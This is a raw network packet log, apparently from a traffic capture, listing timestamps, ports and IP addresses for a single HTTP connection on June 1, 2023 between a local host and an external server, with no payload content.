Jun 1, 2023 22:35:35.856955051 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.856950045 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857049942 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857120037 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857125998 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857170105 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857198954 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857296944 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857296944 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857362032 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857364893 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857419968 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857475996 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857496023 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857530117 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857563972 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857563972 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857584953 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857641935 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857697964 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857707024 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857707024 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857753038 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857764959 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857808113 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857861996 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857877016 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857877016 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857917070 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.857952118 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.857970953 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858000994 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858000994 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858026028 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858082056 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858136892 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858148098 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858148098 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858191967 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858206987 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858282089 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858323097 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858366966 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858372927 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858464003 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858491898 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858530998 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858541965 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858587027 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858639956 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858692884 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858717918 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858747005 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858768940 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858768940 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858800888 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858855009 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858891010 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858891964 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.858906984 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.858963013 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:35.859069109 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.859069109 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:35.859236002 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.019115925 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019237995 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019331932 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019373894 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.019403934 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019444942 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.019484043 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019515991 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.019577026 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019656897 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019681931 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.019757032 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019799948 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.019834042 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.019844055 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019942045 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.019946098 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020031929 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020062923 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020165920 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020181894 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020232916 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020256996 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020335913 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020363092 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020402908 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020414114 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020483971 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020486116 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020558119 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020567894 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020663977 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020665884 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020714045 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020745039 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020808935 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020838022 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020889997 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.020909071 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.020981073 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021008968 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021061897 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021094084 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021168947 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021195889 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021226883 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021250010 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021282911 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021331072 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021337986 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021379948 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021393061 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021429062 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021447897 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021502972 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021503925 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021503925 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021555901 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021610975 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021639109 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021639109 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021663904 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021718979 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021735907 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021773100 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021784067 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021828890 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021862030 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021883011 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021917105 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021939039 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.021965027 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.021992922 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022016048 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022047043 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022088051 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022100925 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022155046 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022186041 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022208929 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022263050 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022294998 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022317886 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022347927 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022372007 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022397041 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022427082 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022481918 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022484064 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022485018 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022536039 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022588968 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022592068 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022592068 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022644043 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022690058 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022697926 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022738934 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022752047 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022805929 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022808075 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022809029 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022861004 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022914886 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022916079 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.022964001 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.022972107 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023013115 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023025990 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023061991 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023081064 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023134947 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023159981 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023159981 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023190975 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023246050 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023256063 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023299932 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023304939 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023354053 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023354053 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023403883 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023411036 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023428917 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023447037 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023462057 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023462057 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023463964 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023480892 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023499012 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023516893 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023535013 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023551941 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023570061 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023578882 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023578882 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023587942 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023606062 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023622990 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023627043 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023627043 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023641109 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023658991 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023675919 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.023677111 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023677111 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023677111 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023802996 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.023884058 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.183701992 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.183831930 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.183924913 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.183959961 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.183995962 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184035063 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184132099 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184165001 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184202909 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184226990 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184267998 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184338093 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184362888 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184362888 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184405088 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184431076 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184472084 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184535027 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184597015 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184613943 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184613943 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184659958 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184741974 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184798956 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184798956 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.184825897 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184931040 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.184974909 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185036898 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185038090 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.185143948 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.185156107 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185215950 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185260057 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.185372114 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.185415983 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185415983 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185477972 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.185579062 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.185600996 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185678959 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.185678959 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185734987 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185767889 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.185875893 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.185889959 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185950994 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.185961962 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186028004 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186089039 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.186136007 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186146975 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.186240911 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186276913 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.186336040 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.186348915 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186454058 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186453104 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.186511040 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.186562061 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186670065 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186693907 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.186752081 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.186784983 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186842918 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.186954021 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.186971903 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187063932 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187160015 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187172890 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187220097 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187249899 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187316895 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187378883 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187380075 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187380075 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187442064 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187504053 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187575102 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187577009 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187575102 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187597036 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187616110 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187634945 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187655926 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187669992 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187670946 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187690020 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187709093 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187726974 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187733889 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187733889 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187733889 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187745094 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187752008 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187752008 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187763929 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187782049 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187800884 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187829971 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187849045 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187876940 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187896967 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187922955 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187942982 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187961102 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187979937 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187998056 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187999010 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.187999010 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187999010 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.187999010 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188021898 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188021898 CEST	49848	80	192.168.11.20	203.175.174.69
Jun 1, 2023 22:35:36.188024044 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188043118 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188060999 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188079119 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188097000 CEST	80	49848	203.175.174.69	192.168.11.20
Jun 1, 2023 22:35:36.188103914 CEST	49848	80	192.168.11.20	203.175.174.69
